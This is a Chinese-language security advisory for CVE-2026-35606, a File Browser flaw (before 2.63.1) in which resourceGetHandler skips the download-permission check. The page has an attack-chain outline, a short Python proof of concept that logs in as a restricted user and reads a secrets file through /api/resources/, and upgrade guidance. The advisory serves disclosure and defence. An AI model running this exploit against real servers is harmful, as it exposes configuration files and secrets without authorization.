IPBUF安全漏洞报告
English
CVE-2026-35606 CVSS 7.5 高危

CVE-2026-35606 File Browser权限绕导致信息泄露

披露日期: 2026-04-07
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-35606
漏洞类型
权限绕过
CVSS评分
7.5 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
File Browser

相关标签

权限绕过信息泄露File BrowserCVE-2026-35606

漏洞概述

File Browser是一款用于在指定目录内上传、删除、预览、重命名和编辑文件的文件管理界面。在2.63.1版本之前,http/resource.go中的resourceGetHandler函数在返回文本文件内容时,未检查Perm.Download权限标志。虽然其他三个内容服务端点均正确验证了此权限,但该漏洞允许下载权限被设置为false的用户通过两条绕过路径读取其范围内的任何文本文件。

技术细节

该漏洞的核心在于File Browser代码库中http/resource.go文件的resourceGetHandler函数存在逻辑疏忽。该函数用于响应客户端获取文件资源的请求,但在实现过程中,开发人员遗漏了对用户下载权限的校验步骤。相比之下,系统中的其他三个内容服务端点(/api/raw、/api/preview、/api/subtitle)均正确实施了该权限检查。由于这一不一致性,攻击者无需具备下载权限,即可利用该接口读取服务器允许访问的任意文本文件。该漏洞允许低权限用户通过两条特定的绕过路径访问敏感数据,破坏了系统的访问控制策略。攻击者只需拥有基本的文件浏览权限,即可利用此缺陷获取配置文件、源代码或其他敏感文本信息,造成严重的信息泄露。

攻击链分析

STEP 1
侦察
攻击者发现目标系统使用的是存在漏洞的File Browser版本(< 2.63.1)。
STEP 2
获取访问权限
攻击者通过合法或非法手段获取了一个受限用户账号,该账号的下载权限被设置为false。
STEP 3
识别绕过路径
攻击者分析API端点,确定resourceGetHandler处理的两条特定请求路径未进行权限校验。
STEP 4
发起攻击
攻击者构造特定的HTTP请求,通过这两条路径请求读取服务器上的敏感文本文件(如配置文件、密钥等)。
STEP 5
获取数据
服务器由于未检查下载权限,直接返回了请求的文件内容,攻击者成功获取敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target configuration target_url = "http://example.com" username = "low_priv_user" password = "password" # 1. Authenticate with a user that has 'download: false' permission session = requests.Session() login_payload = { "username": username, "password": password } print("[+] Logging in...") login_resp = session.post(f"{target_url}/api/login", json=login_payload) if login_resp.status_code != 200: print("[-] Login failed") exit(1) print("[+] Login successful") # 2. Exploit the vulnerability by requesting a file via the vulnerable endpoint # The specific endpoint triggering resourceGetHandler might vary based on routing, # but typically involves requesting file resources directly. target_file = "/config/secrets.conf" # Example sensitive file # Construct the exploit request. # Note: The endpoint might be /api/resources/ or similar where resourceGetHandler is active. exploit_url = f"{target_url}/api/resources/{target_file}" print(f"[+] Attempting to read file: {target_file}") resp = session.get(exploit_url) if resp.status_code == 200: print("[+] Vulnerability exploited successfully!") print("[+] File content:") print(resp.text) else: print(f"[-] Exploit failed or file not found. Status code: {resp.status_code}")

影响范围

File Browser < 2.63.1

防御指南

临时缓解措施
建议立即将File Browser升级至2.63.1或更高版本以修复此漏洞。如果无法立即升级,应严格限制对File Browser服务的网络访问,仅允许可信的内网IP访问,并密切监控用户活动日志,排查是否有未授权读取文件的操作。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表